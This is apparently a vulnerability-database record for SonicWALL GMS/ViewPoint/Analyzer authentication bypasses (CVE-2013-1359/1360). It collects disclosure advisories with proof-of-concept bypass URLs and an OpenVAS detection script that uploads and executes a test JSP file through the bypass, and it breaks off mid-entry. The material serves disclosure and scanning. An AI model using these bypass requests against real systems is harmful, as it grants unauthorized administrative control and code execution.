ID SECURITYVULNS:VULN:12839
Type securityvulns
Reporter BUGTRAQ
Modified 2013-01-21T00:00:00
Description
It's possible to access few directories without authentication
{"id": "SECURITYVULNS:VULN:12839", "bulletinFamily": "software", "title": "SonicWALL GMS/Viewpoint/Analyzer authentication bypass", "description": "It's possible to access few directories without authentication", "published": "2013-01-21T00:00:00", "modified": "2013-01-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12839", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:28968", "https://vulners.com/securityvulns/securityvulns:doc:28969"], "cvelist": ["CVE-2013-1360", "CVE-2013-1359"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:50", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "7833e3a6df91d3e67920b5c6b54de8a0"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "80c463499c5069fd5a81dbf7954899ce"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "6d9560156761949d80d757a4a15d6843"}, {"key": "href", "hash": "c6e8005ac78e4f04d4c28310614f4049"}, {"key": "modified", "hash": "941617cf2229060091a5102cb9bd27a5"}, {"key": "published", "hash": "941617cf2229060091a5102cb9bd27a5"}, {"key": "references", "hash": "fc629087990ad4552b32b89ee6edacbd"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "57a7e29dc98e184266fa03d7e373cd7d"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "ba6723a470142e982b4ee7012131b2cf557a8a6b6b2b86975319f0622e640fa8", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-08-31T11:09:50"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "affectedSoftware": [{"name": "SonicWALL Global Management System", "operator": "eq", "version": "7.0"}]}
{"openvas": [{"lastseen": "2018-09-20T16:11:44", "references": ["http://sotiriu.de/adv/NSOADV-2013-001.txt", "http://www.securityfocus.com/bid/57445", "http://www.sonicwall.com/"], "pluginID": "1361412562310103642", "description": "Multiple SonicWALL products including Global Management System (GMS),\nViewPoint, Universal Management Appliance (UMA), and Analyzer are\nprone to an authentication-bypass vulnerability.\n\nAttackers can exploit this issue to gain administrative access to the\nweb interface. This allows attackers to execute arbitrary code with\nSYSTEM privileges that could fully compromise the system.\n\nThe following versions are affected:\n\nGMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x\nGMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x", "edition": 4, "reporter": "This script is Copyright (C) 2013 Greenbone Networks GmbH", "published": "2013-01-18T00:00:00", "title": "Multiple SonicWALL Products Authentication Bypass Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1360", "CVE-2013-1359"], "modified": "2018-09-20T00:00:00", "id": "OPENVAS:1361412562310103642", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103642", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_SonicWALL_rce_01_13.nasl 11497 2018-09-20 10:31:54Z mmartin $\n#\n# Multiple SonicWALL Products Authentication Bypass Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103642\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(57445);\n script_cve_id(\"CVE-2013-1359\", \"CVE-2013-1360\");\n script_version(\"$Revision: 11497 $\");\n\n script_name(\"Multiple SonicWALL Products Authentication Bypass Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/57445\");\n script_xref(name:\"URL\", value:\"http://www.sonicwall.com/\");\n script_xref(name:\"URL\", value:\"http://sotiriu.de/adv/NSOADV-2013-001.txt\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-20 12:31:54 +0200 (Thu, 20 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-18 13:01:11 +0100 (Fri, 18 Jan 2013)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\ninformation.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Multiple SonicWALL products including Global Management System (GMS),\nViewPoint, Universal Management Appliance (UMA), and Analyzer are\nprone to an authentication-bypass vulnerability.\n\nAttackers can exploit this issue to gain administrative access to the\nweb interface. This allows attackers to execute arbitrary code with\nSYSTEM privileges that could fully compromise the system.\n\nThe following versions are affected:\n\nGMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x\nGMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_http_port(default:80);\n\nurl = \"/\";\nbuf = http_get_cache(item:url, port:port);\n\nif(\"<title>sonicwall\" >!< tolower(buf))exit(0);\n\nuseragent = get_http_user_agent();\nvtstring = get_vt_string( lowercase:TRUE );\nhost = http_host_name(port:port);\n\nreq = string(\n\"POST /appliance/applianceMainPage?skipSessionCheck=1 HTTP/1.1\\r\\n\",\n\"TE: deflate,gzip;q=0.3\\r\\n\",\n\"Connection: TE, close\\r\\n\",\n\"Host: \",host,\"\\r\\n\",\n\"User-Agent: \", useragent, \"\\r\\n\",\n\"Content-Length: 90\\r\\n\",\n\"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\",\n\"\\r\\n\",\n\"num=123456&action=show_diagnostics&task=search&item=application_log&criteria=*.*&width=500\\r\\n\");\n\nresult = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(\"<OPTION VALUE\" >!< result)exit(0);\n\nlines = split(result);\n\nforeach line (lines) {\n if(\"<OPTION VALUE\" >< line) {\n a = split(line,sep:'\"', keep:FALSE);\n if(\"logs\" >< a[1]) {\n b = split(a[1],sep:\"logs\",keep:FALSE);\n gms_path = b[0];\n if(!isnull(gms_path))break;\n }\n }\n}\n\nif(isnull(gms_path))exit(0);\n\nif(gms_path =~ \"^/\") {\n gms_path = gms_path + \"webapps/appliance/\";\n}\nelse {\n gms_path = gms_path + 'webapps\\\\appliance\\\\';\n}\n\nfile = vtstring + '_' + rand() + '.jsp';\n\njsp_print = vtstring + '_' + rand();;\njsp = '<% out.println( \"' + jsp_print + '\" ); %>';\n\nlen = 325 + strlen(jsp) + strlen(gms_path) + strlen(file);\n\nreq = string(\n\"POST /appliance/applianceMainPage?skipSessionCheck=1 HTTP/1.1\\r\\n\",\n\"TE: deflate,gzip;q=0.3\\r\\n\",\n\"Connection: TE, close\\r\\n\",\n\"Host: \",host,\"\\r\\n\",\n\"User-Agent: \", useragent, \"\\r\\n\",\n\"Content-Length: \",len,\"\\r\\n\",\n\"Content-Type: multipart/form-data; boundary=xYzZY\\r\\n\",\n\"\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"action\"',\"\\r\\n\",\n\"\\r\\n\",\n\"file_system\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"task\"',\"\\r\\n\",\n\"\\r\\n\",\n\"uploadFile\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"searchFolder\"',\"\\r\\n\",\n\"\\r\\n\",\ngms_path,\"\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"uploadFileName\"; filename=\"',file,'\"',\"\\r\\n\",\n\"Content-Type: text/plain\\r\\n\",\n\"\\r\\n\",\njsp,\"\\r\\n\",\n\n\"\\r\\n\",\n\"--xYzZY--\\r\\n\");\n\nresult = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(result !~ \"HTTP/1.. 200\")exit(0);\n\nurl = '/appliance/' + file;\nreq = http_get(item:url, port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(jsp_print >< buf) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "references": [], "description": "\r\n\r\n______________________________________________________________________\r\n-------------------------- NSOADV-2013-002 ---------------------------\r\n\r\nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n 111101111\r\n 11111 00110 00110001111\r\n 111111 01 01 1 11111011111111\r\n 11111 0 11 01 0 11 1 1 111011001\r\n 11111111101 1 11 0110111 1 1111101111\r\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\r\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\r\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\r\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\r\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\r\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\r\n 01110 0 10 111110 110 0 11101111111111111111101111101\r\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111\r\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\r\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\r\n 111 10 110 101011110010 11111111111111111111111 11 0011100\r\n 11 10 001100 0001 111111111111111111 10 11 11110\r\n 11110 00100 00001 10 1 1111 101010001 11111111\r\n 11101 0 1011 10000 00100 11100 00001101 0\r\n 0110 111011011 0110 10001 101 11110\r\n 1011 1 10 101 000001 01 00\r\n 1010 1 11001 1 1 101 10\r\n 110101011 0 101 11110\r\n 110000011\r\n 111\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: SonicWALL GMS/Viewpoint/Analyzer\r\n Authentication Bypass (/sgms/)\r\n Severity: Critical\r\n CVE-ID: CVE-2013-1360\r\n CVSS Base Score: 9\r\n Impact: 8.5\r\n Exploitability: 10\r\n CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C\r\n Advisory ID: NSOADV-2013-002\r\n Found Date: 2012-04-26\r\n Date Reported: 2012-12-13\r\n Release Date: 2013-01-17\r\n Author: Nikolas Sotiriu\r\n Website: http://sotiriu.de\r\n Twitter: http://twitter.com/nsoresearch\r\n Mail: nso-research at sotiriu.de\r\n URL: http://sotiriu.de/adv/NSOADV-2013-002.txt\r\n Vendor: DELL SonicWALL (http://www.sonicwall.com/)\r\n Affected Products: GMS\r\n Analyzer\r\n UMA\r\n ViewPoint\r\n Affected Platforms: Windows/Linux\r\n Affected Versions: GMS/Analyzer/UMA 7.0.x\r\n GMS/ViewPoint/UMA 6.0.x\r\n GMS/ViewPoint/UMA 5.1.x\r\n GMS/ViewPoint 5.0.x\r\n GMS/ViewPoint 4.1.x\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nThe SonicWALL\u00ae Global Management System (GMS) provides organizations,\r\ndistributed enterprises and service providers with a powerful and\r\nintuitive solution to centrally manage and rapidly deploy SonicWALL\r\nfirewall, anti-spam, backup and recovery, and secure remote access\r\nsolutions. Flexibly deployed as software, hardware, or a virtual\r\nappliance, SonicWALL GMS offers centralized real-time monitoring, and\r\ncomprehensive policy and compliance reporting. For enterprise customers,\r\nSonicWALL GMS streamlines security policy management and appliance\r\ndeployment, minimizing administration overhead. Service Providers can\r\nuse GMS to simplify the security management of multiple clients and\r\ncreate additional revenue opportunities. For added redundancy and\r\nscalability, GMS can be deployed in a cluster configuration.\r\n\r\n(Product description from Website)\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that\r\nallows an unauthenticated, remote attacker to bypass the Web interface\r\nauthentication offered by the affected product.\r\n\r\nThe vulnerability is attributed to a broken session handling in the\r\nprocess of password change process of the web application.\r\nchanging in the web application.\r\n\r\nAn attacker may exploit this vulnerability by sending a specially\r\ncrafted request to the SGMS Interface (/sgms/).\r\n\r\nThe attacker gains full administrative access to the interface and\r\nfull control over all managed appliances, which could lead to a full\r\ncompromisation of the organisation.\r\n\r\n\r\n\r\nProof of Concept :\r\n==================\r\n\r\nAccess the following URL to login to the sgms interface:\r\n\r\nhttp://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663\r\n83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092\r\n4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000\r\n00000000001\r\n\r\nIf the Console is not directly shown, type any password you\r\nwant in the change password dialog twice and hit submit to login.\r\n\r\nMaybe you need to access the following URL after this process:\r\n\r\nhttp://host/sgms/auth\r\n\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nInstall Hotfix 125076.77. (Download from www.mysonicwall.com)\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n====================\r\n\r\n2012-04-26: Vulnerability found\r\n2012-12-12: Sent the notification and disclosure policy and asked\r\n for a PGP Key (security@sonicwall.com)\r\n2012-12-13: Sent advisory, disclosure policy and planned disclosure\r\n date (2012-12-28) to vendor\r\n2012-12-18: SonicWALL analyzed the finding and wishes to delay the\r\n release to the 3. calendar week 2013.\r\n2012-12-18: Changed release date to 2013-01-17.\r\n2012-12-20: Patch is published\r\n2013-01-17: Release of this advisory\r\n\r\n\r\n\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2013-01-21T00:00:00", "title": "NSOADV-2013-002: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:46", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2013-1360"], "modified": "2013-01-21T00:00:00", "id": "SECURITYVULNS:DOC:28969", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28969", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:46", "references": [], "description": "\r\n\r\n______________________________________________________________________\r\n-------------------------- NSOADV-2013-001 ---------------------------\r\n\r\nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n 111101111\r\n 11111 00110 00110001111\r\n 111111 01 01 1 11111011111111\r\n 11111 0 11 01 0 11 1 1 111011001\r\n 11111111101 1 11 0110111 1 1111101111\r\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\r\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\r\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\r\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\r\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\r\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\r\n 01110 0 10 111110 110 0 11101111111111111111101111101\r\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111\r\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\r\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\r\n 111 10 110 101011110010 11111111111111111111111 11 0011100\r\n 11 10 001100 0001 111111111111111111 10 11 11110\r\n 11110 00100 00001 10 1 1111 101010001 11111111\r\n 11101 0 1011 10000 00100 11100 00001101 0\r\n 0110 111011011 0110 10001 101 11110\r\n 1011 1 10 101 000001 01 00\r\n 1010 1 11001 1 1 101 10\r\n 110101011 0 101 11110\r\n 110000011\r\n 111\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: SonicWALL GMS/Viewpoint/Analyzer\r\n Authentication Bypass (/appliance/)\r\n Severity: Critical\r\n CVE-ID: CVE-2013-1359\r\n CVSS Base Score: 10\r\n Impact: 10\r\n Exploitability: 10\r\n CVSS2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C\r\n Advisory ID: NSOADV-2013-001\r\n Found Date: 2012-04-26\r\n Date Reported: 2012-12-13\r\n Release Date: 2013-01-17\r\n Author: Nikolas Sotiriu\r\n Website: http://sotiriu.de\r\n Twitter: http://twitter.com/nsoresearch\r\n Mail: nso-research at sotiriu.de\r\n URL: http://sotiriu.de/adv/NSOADV-2013-001.txt\r\n Vendor: DELL SonicWALL (http://www.sonicwall.com/)\r\n Affected Products: GMS\r\n Analyzer\r\n UMA\r\n ViewPoint\r\n Affected Platforms: Windows/Linux\r\n Affected Versions: GMS/Analyzer/UMA 7.0.x\r\n GMS/ViewPoint/UMA 6.0.x\r\n GMS/ViewPoint/UMA 5.1.x\r\n GMS/ViewPoint 5.0.x\r\n GMS/ViewPoint 4.1.x\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nThe SonicWALL\u00ae Global Management System (GMS) provides organizations,\r\ndistributed enterprises and service providers with a powerful and\r\nintuitive solution to centrally manage and rapidly deploy SonicWALL\r\nfirewall, anti-spam, backup and recovery, and secure remote access\r\nsolutions. Flexibly deployed as software, hardware, or a virtual\r\nappliance, SonicWALL GMS offers centralized real-time monitoring, and\r\ncomprehensive policy and compliance reporting. For enterprise customers,\r\nSonicWALL GMS streamlines security policy management and appliance\r\ndeployment, minimizing administration overhead. Service Providers can\r\nuse GMS to simplify the security management of multiple clients and\r\ncreate additional revenue opportunities. For added redundancy and\r\nscalability, GMS can be deployed in a cluster configuration.\r\n\r\n(Product description from Website)\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that\r\nallows an unauthenticated, remote attacker to bypass the Web interface\r\nauthentication offered by the affected product.\r\n\r\nThe vulnerability is attributed to a built-in function to skip the\r\nsession check of the web application.\r\n\r\nAn attacker may exploit this vulnerability by sending a request\r\nto the UMA Interface (/appliance/) with the parameter\r\n"skipSessionCheck=1".\r\n\r\nThe attacker gains full administrative access to the interface and\r\ncould execute code with root or SYSTEM permissions, which leads to\r\na full compromisation of the system.\r\n\r\n\r\n\r\nProof of Concept:\r\n=================\r\n\r\nhttp://host/appliance/applianceMainPage?action=status&skipSessionCheck=1\r\n\r\nThe remote Root/System exploit is attached.\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nInstall Hotfix 125076.77. (Download from www.mysonicwall.com)\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n====================\r\n\r\n2012-04-26: Vulnerability found\r\n2012-12-12: Sent the notification and disclosure policy and asked\r\n for a PGP Key (security@sonicwall.com)\r\n2012-12-13: Sent advisory, disclosure policy and planned disclosure\r\n date (2012-12-28) to vendor\r\n2012-12-18: SonicWALL analyzed the finding and wishes to delay the\r\n release to the 3. calendar week 2013.\r\n2012-12-18: Changed release date to 2013-01-17.\r\n2012-12-20: Patch is published\r\n2013-01-17: Release of this advisory\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2013-01-21T00:00:00", "title": "NSOADV-2013-001: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:46", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2013-1359"], "modified": "2013-01-21T00:00:00", "id": "SECURITYVULNS:DOC:28968", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28968", "cvss": {"score": 0.0, "vector": "NONE"}}], "saint": [{"lastseen": "2016-10-03T15:01:55", "references": [], "description": "Added: 03/18/2013 \nCVE: [CVE-2013-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359>) \nBID: [57445](<http://www.securityfocus.com/bid/57445>) \nOSVDB: [89347](<http://www.osvdb.org/89347>) \n\n\n### Background\n\nDell SonicWALL has several [management and reporting solutions](<http://www.sonicwall.com/us/en/products/Centralized_Management_Reporting.html>) which provide a centralized architecture for creating and managing security policies, providing real-time monitoring and alerts, and delivering compliance and usage reports from a single management interface. These products include SonicWALL ViewPoint (being discontinued and replaced by SonicWALL Analyzer), Global Management System (GMS), and the Universal Management Appliance (UMA). \n\n### Problem\n\nVarious versions of Dell SonicWALL ViewPoint, Analyzer, GMS and UAM contain an error within the authentication mechanism of the web interface which can be exploited to bypass the authentication mechanism by setting the `**skipSessionCheck**` parameter to 1. \n\n### Resolution\n\nObtain HotFix 125076.77 from <http://www.mysonicwall.com> and apply the appropriate files for your product. \n\n### References\n\n<http://secunia.com/advisories/51758/> \n\n\n### Limitations\n\nThis exploit was tested against SonicWALL GMS 7.0 SP1 on Windows Server 2003 SP2 English and Windows Server 2008 SP2 (with DEP OptOut). It was also tested against SonicWALL GMS Virtual Appliance 7.0 SP1 on SonicWALL Linux 2.6.23.8. \n\nThis exploit supports IPv6 on Windows platforms, but not on GMS Virtual Appliance platforms. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2013-03-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "saint", "title": "SonicWall Multiple Products skipSessionCheck Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1359"], "modified": "2013-03-18T00:00:00", "id": "SAINT:F3B855C79359E1F0667451D37C614E49", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/sonicwall_skipsessioncheck_auth_bypass", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-01-10T14:03:41", "references": [], "edition": 1, "description": "Added: 03/18/2013 \nCVE: [CVE-2013-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359>) \nBID: [57445](<http://www.securityfocus.com/bid/57445>) \nOSVDB: [89347](<http://www.osvdb.org/89347>) \n\n\n### Background\n\nDell SonicWALL has several [management and reporting solutions](<http://www.sonicwall.com/us/en/products/Centralized_Management_Reporting.html>) which provide a centralized architecture for creating and managing security policies, providing real-time monitoring and alerts, and delivering compliance and usage reports from a single management interface. These products include SonicWALL ViewPoint (being discontinued and replaced by SonicWALL Analyzer), Global Management System (GMS), and the Universal Management Appliance (UMA). \n\n### Problem\n\nVarious versions of Dell SonicWALL ViewPoint, Analyzer, GMS and UAM contain an error within the authentication mechanism of the web interface which can be exploited to bypass the authentication mechanism by setting the `**skipSessionCheck**` parameter to 1. \n\n### Resolution\n\nObtain HotFix 125076.77 from <http://www.mysonicwall.com> and apply the appropriate files for your product. \n\n### References\n\n<http://secunia.com/advisories/51758/> \n\n\n### Limitations\n\nThis exploit was tested against SonicWALL GMS 7.0 SP1 on Windows Server 2003 SP2 English and Windows Server 2008 SP2 (with DEP OptOut). It was also tested against SonicWALL GMS Virtual Appliance 7.0 SP1 on SonicWALL Linux 2.6.23.8. \n\nThis exploit supports IPv6 on Windows platforms, but not on GMS Virtual Appliance platforms. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "reporter": "SAINT Corporation", "published": "2013-03-18T00:00:00", "title": "SonicWall Multiple Products skipSessionCheck Authentication Bypass", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1359"], "modified": "2013-03-18T00:00:00", "id": "SAINT:7A9FC357D019902C8221DA08FCAAE376", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/sonicwall_skipsessioncheck_auth_bypass", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-14T16:58:06", "references": [], "edition": 1, "description": "Added: 03/18/2013 \nCVE: [CVE-2013-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359>) \nBID: [57445](<http://www.securityfocus.com/bid/57445>) \nOSVDB: [89347](<http://www.osvdb.org/89347>) \n\n\n### Background\n\nDell SonicWALL has several [management and reporting solutions](<http://www.sonicwall.com/us/en/products/Centralized_Management_Reporting.html>) which provide a centralized architecture for creating and managing security policies, providing real-time monitoring and alerts, and delivering compliance and usage reports from a single management interface. These products include SonicWALL ViewPoint (being discontinued and replaced by SonicWALL Analyzer), Global Management System (GMS), and the Universal Management Appliance (UMA). \n\n### Problem\n\nVarious versions of Dell SonicWALL ViewPoint, Analyzer, GMS and UAM contain an error within the authentication mechanism of the web interface which can be exploited to bypass the authentication mechanism by setting the `**skipSessionCheck**` parameter to 1. \n\n### Resolution\n\nObtain HotFix 125076.77 from <http://www.mysonicwall.com> and apply the appropriate files for your product. \n\n### References\n\n<http://secunia.com/advisories/51758/> \n\n\n### Limitations\n\nThis exploit was tested against SonicWALL GMS 7.0 SP1 on Windows Server 2003 SP2 English and Windows Server 2008 SP2 (with DEP OptOut). It was also tested against SonicWALL GMS Virtual Appliance 7.0 SP1 on SonicWALL Linux 2.6.23.8. \n\nThis exploit supports IPv6 on Windows platforms, but not on GMS Virtual Appliance platforms. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "reporter": "SAINT Corporation", "published": "2013-03-18T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "SonicWall Multiple Products skipSessionCheck Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1359"], "modified": "2013-03-18T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/sonicwall_skipsessioncheck_auth_bypass", "id": "SAINT:1D818306CDCE9D06452355B580B07037", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:51", "references": [], "edition": 1, "description": "", "reporter": "Nikolas Sotiriu", "published": "2013-01-18T00:00:00", "type": "packetstorm", "title": "DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1360"], "modified": "2013-01-18T00:00:00", "href": "https://packetstormsecurity.com/files/119639/DELL-SonicWALL-GMS-Viewpoint-Analyzer-Authentication-Bypass.html", "id": "PACKETSTORM:119639", "sourceData": "`______________________________________________________________________ \n-------------------------- NSOADV-2013-002 --------------------------- \n \nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) \n______________________________________________________________________ \n______________________________________________________________________ \n \n111101111 \n11111 00110 00110001111 \n111111 01 01 1 11111011111111 \n11111 0 11 01 0 11 1 1 111011001 \n11111111101 1 11 0110111 1 1111101111 \n1001 0 1 10 11 0 10 11 1111111 1 111 111001 \n111111111 0 10 1111 0 11 11 111111111 1 1101 10 \n00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100 \n10111111 0 01 0 1 1 111110 11 1111111111111 11110000011 \n0111111110 0110 1110 1 0 11101111111111111011 11100 00 \n01111 0 10 1110 1 011111 1 111111111111111111111101 01 \n01110 0 10 111110 110 0 11101111111111111111101111101 \n111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 \n111110110 10 0111110 1 0 0 1111111111111111111111111 110 \n111 11111 1 1 111 1 10011 101111111111011111111 0 1100 \n111 10 110 101011110010 11111111111111111111111 11 0011100 \n11 10 001100 0001 111111111111111111 10 11 11110 \n11110 00100 00001 10 1 1111 101010001 11111111 \n11101 0 1011 10000 00100 11100 00001101 0 \n0110 111011011 0110 10001 101 11110 \n1011 1 10 101 000001 01 00 \n1010 1 11001 1 1 101 10 \n110101011 0 101 11110 \n110000011 \n111 \n______________________________________________________________________ \n______________________________________________________________________ \n \nTitle: SonicWALL GMS/Viewpoint/Analyzer \nAuthentication Bypass (/sgms/) \nSeverity: Critical \nCVE-ID: CVE-2013-1360 \nCVSS Base Score: 9 \nImpact: 8.5 \nExploitability: 10 \nCVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C \nAdvisory ID: NSOADV-2013-002 \nFound Date: 2012-04-26 \nDate Reported: 2012-12-13 \nRelease Date: 2013-01-17 \nAuthor: Nikolas Sotiriu \nWebsite: http://sotiriu.de \nTwitter: http://twitter.com/nsoresearch \nMail: nso-research at sotiriu.de \nURL: http://sotiriu.de/adv/NSOADV-2013-002.txt \nVendor: DELL SonicWALL (http://www.sonicwall.com/) \nAffected Products: GMS \nAnalyzer \nUMA \nViewPoint \nAffected Platforms: Windows/Linux \nAffected Versions: 